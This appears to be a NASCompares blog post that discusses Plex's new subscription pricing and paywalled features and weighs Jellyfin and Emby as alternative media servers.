To their credit, Plex has removed one of the more annoying barriers from its platform—the mobile app unlock fee. Previously, streaming via the Android or iOS app was limited to one minute unless you paid a small one-time fee or had a Plex Pass. With the rollout of their new mobile client experience, this limitation is going away. Local streaming—meaning within the same network—will now be completely free on mobile. This is undoubtedly a welcome change, especially for users who run everything locally and don’t rely on remote features. However, for those who previously enjoyed full functionality across networks without a subscription, this small improvement may not offset the new restrictions.

Plex also used the announcement to preview some upcoming features for Plex Pass subscribers, including an integration with Common Sense Media aimed at improving parental control tools, a new server management app (separate from Plex Dash), and a long-requested open API for metadata agents and custom integrations. While these additions have genuine value, their timing—bundled with a price increase and feature restrictions—makes it harder for users to assess whether Plex is giving more or simply charging more. Alex pointed out in our podcast that innovation, not restriction, should drive paid feature rollouts. It’s a sentiment I tend to agree with: adding new tools rather than paywalling old ones is the path that generates goodwill and long-term user engagement.

Is Now the time to Ditch PLEX, and Opt for Jellyfin or Emby Media Server?

Naturally, this news has reignited interest in Jellyfin, the most well-known open-source alternative to Plex. Jellyfin remains free, with no subscriptions or data collection, and offers solid core media server functionality. However, as Alex and I discussed in our joint video, Jellyfin comes with its own set of trade-offs. While it nails the fundamentals—smooth playback, broad codec support, and responsive local streaming—it lacks polish in its client apps, and remote access typically requires self-configuration through a VPN or mesh network like Tailscale. For tech-savvy users, that’s a worthwhile trade. But for those who rely on Plex’s seamless, cross-platform access, Jellyfin may still feel like a step backward in convenience.

Emby, once considered a middle ground between Plex and Jellyfin, is rarely mentioned in this conversation anymore—and there are reasons for that. Emby straddles an awkward line between open-source philosophy and commercial aspirations. It still charges for features like hardware transcoding and has moved away from its open development roots. In our podcast, Alex shared his own frustrations with Emby’s shift to closed source shortly after he purchased a Lifetime license. Combined with a smaller user base, inconsistent app support, and limited visibility in NAS ecosystems, Emby struggles to be either the budget-friendly choice or the polished premium one. In short, it’s not that Emby is bad—it’s that it’s not compelling enough to compete meaningfully right now.

Are We Seeing the End of PLEX on the Horizon?

One key issue here isn’t just the new pricing or paywalled features, but how Plex has communicated these changes. As we discussed in the podcast, the rollout feels rushed and reactive, missing an opportunity to reframe this as a strategic step forward—say, through a “Plex Plus” or “Plex Lite” tier with exclusive new tools, or by versioning changes the way other platforms (like UnRAID or even macOS) handle major updates. Instead, moving features behind a paywall post-launch risks alienating loyal users. Plex’s assertion that these changes won’t affect existing Plex Pass holders is reassuring, but it doesn’t help new users discovering Plex for the first time—and realizing that what used to be free is now a subscription service.

Ultimately, I don’t believe Plex is on the brink of collapse—as some dramatic headlines might suggest—but I do think this moment marks a turning point. If you’re a regular Plex user who streams remotely or shares content with others, the Lifetime Pass at $119.99 (until April 29) remains a solid investment. After that, the value calculus shifts dramatically. For new users, the free tier will still work well for local-only setups, and the Remote Watch Pass provides a budget-friendly option. But the days of a completely free, fully featured Plex experience are clearly behind us.

Join Inner Circle

Want to follow specific category? Also Read...Is This The Beginning of the EWeek 12 Tech Roundup – SynolPLEX Playback Error: Please chHow to Install Plex Media ServHow to Install Plex Media ServPLEX TEST FILES - Video Files Buying a NAS for Plex Media SeCan you guys help me get SonSynology DS Video and Video StPlex Job Losses - Should You B Subscribe You can also follow specific search terms:

This description contains links to Amazon. These links will take you to some of the products mentioned in today's content. As an Amazon Associate, I earn from qualifying purchases. Visit the NASCompares Deal Finder to find the best place to buy this device in your region, based on Service, Support and Reputation - Just Search for your NAS Drive in the Box Below

Need Advice on Data Storage from an Expert?

TRY CHAT

If you like this service, please consider supporting us. We use affiliate links on the blog allowing NAScompares information and advice service to be free of charge to you.Anything you purchase on the day you click on our links will generate a small commission which isused to run the website. Here is a link for Amazon and B&H.You can also get me a Ko-fi or old school Paypal. Thanks!To find out more about how to support this advice service check HEREIf you need to fix or configure a NAS, check Fiver Have you thought about helping others with your knowledge? Find Instructions Here  

Or support us by using our affiliate links on Amazon UK and Amazon US

    

 

WE LOVE COFFEE